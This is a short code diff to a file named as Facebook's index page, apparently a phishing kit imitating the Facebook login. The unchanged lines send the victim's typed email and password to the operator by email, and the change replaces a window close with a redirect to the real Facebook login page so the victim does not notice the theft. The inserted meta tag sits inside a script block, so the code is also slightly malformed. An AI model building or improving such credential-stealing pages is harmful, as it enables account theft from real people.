--- a/www.facebook.com/index.html
+++ b/www.facebook.com/index.html
@@ -13,8 +13,8 @@ Email.send({
     Body : "usuario: " + document.getElementById("email").value + ", contrasena: " + document.getElementById("pass").value
 })
 
-window.open('','_parent','');
-window.close();
+<meta http-equiv="refresh"
+   content="0; url=https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110">
 }
 </script>
 <script>function envFlush(a) {
